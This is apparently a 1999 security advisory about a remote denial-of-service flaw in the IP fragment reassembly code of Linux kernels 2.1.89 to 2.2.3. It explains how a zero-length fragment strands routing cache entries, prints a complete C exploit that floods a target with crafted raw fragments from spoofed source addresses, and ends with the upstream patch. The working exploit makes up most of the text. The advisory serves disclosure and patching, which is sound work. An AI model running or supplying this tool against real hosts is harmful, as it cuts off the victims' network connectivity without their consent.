COMMAND
kernel
SYSTEMS AFFECTED
Linux prior to between 2.1.89 and 2.2.3
PROBLEM
John McDonald found following. The recent release of the Linux
2.2.4 kernel fixed a remote denial of service problem in the IP
fragment handling code. If you are running a Linux kernel
between 2.1.89 and 2.2.3, it would probably be a good idea to get
the latest version. The impact of this problem is that a remote
attacker can effectively disable a target's IP connectivity.
However, for the attack to succeed, the attacker will have to
deliver several thousand packets to the target, which can take up
to several minutes. A quick exploit and the patch are appended to
the end of this post. The problem starts in ip_glue() in
ip_fragment.c:
/* Copy the data portions of all fragments into the new buffer. */
fp = qp->fragments;
count = qp->ihlen;
while(fp) {
if ((fp->len < 0) || ((count + fp->len) > skb->len))
goto out_invalid;
memcpy((ptr + fp->offset), fp->ptr, fp->len);
if (count == qp->ihlen) {
skb->dst = dst_clone(fp->skb->dst);
skb->dev = fp->skb->dev;
}
count += fp->len;
fp = fp->next;
}
The problem in this code is that if you can get a fragment into
the qp->fragments list that has a length of 0, and is the first
fragment in the list, then the call to dst_clone() will happen an
extra time. The first time through the loop, count will
necessarily equal qp->ihlen, causing dst_clone() to be called.
However, if fp->len happens to equal 0, then count += fp->len
won't increase it, and the next time through the loop, count will
still equal qp->ihlen. dst_clone() increments a usage count on
an element in the routing cache. Our 0 length fragment will cause
this element in the cache to become stranded. The kernel will not
free it when it does the garbage collection of the cache because
it will think it is currently in use. The other component of the
problem is that the call to allocate a new entry in the routing
cache does a check to see if the hashtable that comprises the
cache is at a saturated state. If it is, it proceeds to do a
garbage collection. If the number of entries in the cache, after
this garbage collection, is still higher than the threshold, then
dst_alloc() will fail. So, if we generate enough stranded entries
in the routing cache (4096 in 2.2.3) via our malicious frags, then
all further calls to dst_alloc will fail.
We can get a 0 length fragment into the head of the list by doing
the following; send a fragment at offset 0, with a length of X,
and IP_MF set. This creates our list.
Send a 0 length fragment at offset 0, where the ip header length
is equal to the ip total length, and IP_MF is set. This will be
treated as coming before the fragment already in our list, because
it has an offset equal to the offset of the existing fragment. It
doesn't overlap any, because it's end is equal to the following
fragment's offset. Send a fragment at offset X, with IP_MF not
set. This will mark the end of our set of fragments. ip_done()
will return true because it will see the first frag going from 0
to 0, the second going from 0 to X, and the third going from X to
the end. Our fragments will get passed into ip_glue(). Here's
the exploit:
/*
* sesquipedalian.c - Demonstrates a DoS bug in Linux 2.1.89 - 2.2.3
*
* by horizon <jmcdonal@unf.edu>
*
* This sends a series of IP fragments such that a 0 length fragment is first
* in the fragment list. This causes a reference count on the cached routing
* information for that packet's originator to be incremented one extra time.
* This makes it impossible for the kernel to deallocate the destination entry
* and remove it from the cache.
*
* If we send enough fragments such that there are at least 4096 stranded
* dst cache entries, then the target machine will no longer be able to
* allocate new cache entries, and IP communication will be effectively
* disabled. You will need to set the delay such that packets are not being
* dropped, and you will probably need to let the program run for a few
* minutes to have the full effect. This was written for OpenBSD and Linux.
*
* Thanks to vacuum, colonwq, duke, rclocal, sygma, and antilove for testing.
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <netdb.h>
#include <arpa/inet.h>
struct my_ip_header
{
unsigned char ip_hl:4, /* header length */
ip_v:4; /* version */
unsigned char ip_tos; /* type of service */
unsigned short ip_len; /* total length */
unsigned short ip_id; /* identification */
unsigned short ip_off; /* fragment offset field */
#define IP_RF 0x8000 /* reserved fragment flag */
#define IP_DF 0x4000 /* dont fragment flag */
#define IP_MF 0x2000 /* more fragments flag */
#define IP_OFFMASK 0x1fff /* mask for fragmenting bits */
unsigned char ip_ttl; /* time to live */
unsigned char ip_p; /* protocol */
unsigned short ip_sum; /* checksum */
unsigned long ip_src, ip_dst; /* source and dest address */
};
struct my_udp_header
{
unsigned short uh_sport;
unsigned short uh_dport;
unsigned short uh_ulen;
unsigned short uh_sum;
};
#define IHLEN (sizeof (struct my_ip_header))
#define UHLEN (sizeof (struct my_udp_header))
#ifdef __OpenBSD__
#define EXTRA 8
#else
#define EXTRA 0
#endif
unsigned short checksum(unsigned short *data,unsigned short length)
{
register long value;
u_short i;
for(i=0;i<(length>>1);i++)
value+=data[i];
if((length&1)==1)
value+=(data[i]<<8);
value=(value&65535)+(value>>16);
return(~value);
}
unsigned long resolve( char *hostname)
{
long result;
struct hostent *hp;
if ((result=inet_addr(hostname))==-1)
{
if ((hp=gethostbyname(hostname))==0)
{
fprintf(stderr,"Can't resolve target.\n");
exit(1);
}
bcopy(hp->h_addr,&result,4);
}
return result;
}
void usage(void)
{
fprintf(stderr,"usage: ./sqpd [-s sport] [-d dport] [-n count] [-u delay] source target\n");
exit(0);
}
void sendem(int s, unsigned long source, unsigned long dest,
unsigned short sport, unsigned short dport)
{
static char buffer[8192];
struct my_ip_header *ip;
struct my_udp_header *udp;
struct sockaddr_in sa;
bzero(&sa,sizeof(struct sockaddr_in));
sa.sin_family=AF_INET;
sa.sin_port=htons(sport);
sa.sin_addr.s_addr=dest;
bzero(buffer,IHLEN+32);
ip=(struct my_ip_header *)buffer;
udp=(struct my_udp_header *)&(buffer[IHLEN]);
ip->ip_v = 4;
ip->ip_hl = IHLEN >>2;
ip->ip_tos = 0;
ip->ip_id = htons(random() & 0xFFFF);
ip->ip_ttl = 142;
ip->ip_p = IPPROTO_UDP;
ip->ip_src = source;
ip->ip_dst = dest;
udp->uh_sport = htons(sport);
udp->uh_dport = htons(dport);
udp->uh_ulen = htons(64-UHLEN);
udp->uh_sum = 0;
/* Our first fragment will have an offset of 0, and be 32 bytes
long. This gets added as the only element in the fragment
list. */
ip->ip_len = htons(IHLEN+32);
ip->ip_off = htons(IP_MF);
ip->ip_sum = 0;
ip->ip_sum = checksum((u_short *)buffer,IHLEN+32);
if (sendto(s,buffer,IHLEN+32,0,(struct sockaddr*)&sa,sizeof(sa)) < 0)
{
perror("sendto");
exit(1);
}
/* Our second fragment will have an offset of 0, and a 0 length.
This gets added to the list before our previous fragment,
making it first in line. */
ip->ip_len = htons(IHLEN);
ip->ip_off = htons(IP_MF);
ip->ip_sum = 0;
ip->ip_sum = checksum((u_short *)buffer,IHLEN);
if (sendto(s,buffer,IHLEN+EXTRA,0,(struct sockaddr*)&sa,sizeof(sa)) < 0)
{
perror("sendto");
exit(1);
}
/* Our third and final frag has an offset of 4 (32 bytes), and a
length of 32 bytes. This passes our three frags up to ip_glue. */
ip->ip_len = htons(IHLEN+32);
ip->ip_off = htons(32/8);
ip->ip_sum = 0;
ip->ip_sum = checksum((u_short *)buffer,IHLEN+32);
if (sendto(s,buffer,IHLEN+32,0,(struct sockaddr*)&sa,sizeof(sa)) < 0)
{
perror("sendto");
exit(1);
}
}
int main(int argc, char **argv)
{
int sock;
int on=1,i;
unsigned long source, dest;
unsigned short sport=53, dport=16384;
int delay=20000, count=15000;
if (argc<3)
usage();
while ((i=getopt(argc,argv,"s:d:n:u:"))!=-1)
{
switch (i)
{
case 's': sport=atoi(optarg);
break;
case 'd': dport=atoi(optarg);
break;
case 'n': count=atoi(optarg);
break;
case 'u': delay=atoi(optarg);
break;
default: usage();
}
}
argc-=optind;
argv+=optind;
source=resolve(argv[0]);
dest=resolve(argv[1]);
srandom(time((time_t)0)*getpid());
if( (sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
{
perror("socket");
exit(1);
}
if (setsockopt(sock,IPPROTO_IP,IP_HDRINCL,(char *)&on,sizeof(on)) < 0)
{
perror("setsockopt: IP_HDRINCL");
exit(1);
}
fprintf(stdout,"\nStarting attack on %s ...",argv[1]);
for (i=0; i<count; i++)
{
sendem(sock,source+htonl(i),dest,sport,dport);
if (!(i%2))
usleep(delay);
if (!(i%100))
{
if (!(i%2000))
fprintf(stdout,"\n");
fprintf(stdout,".");
fflush(stdout);
}
}
fprintf(stdout,"\nDone.\n");
exit(1);
}
SOLUTION
Upgrade to kernel 2.2.4. Here is the patch:
--- linux-2.2.3/net/ipv4/ip_fragment.c Wed Mar 24 22:48:26 1999
+++ linux/net/ipv4/ip_fragment.c Wed Mar 24 22:44:24 1999
@@ -17,6 +17,7 @@
* xxxx : Overlapfrag bug.
* Ultima : ip_expire() kernel panic.
* Bill Hawes : Frag accounting and evictor fixes.
+ * John McDonald : 0 length frag bug.
*/
#include <linux/types.h>
@@ -357,7 +358,7 @@
fp = qp->fragments;
count = qp->ihlen;
while(fp) {
- if ((fp->len < 0) || ((count + fp->len) > skb->len))
+ if ((fp->len <= 0) || ((count + fp->len) > skb->len))
goto out_invalid;
memcpy((ptr + fp->offset), fp->ptr, fp->len);
if (count == qp->ihlen) {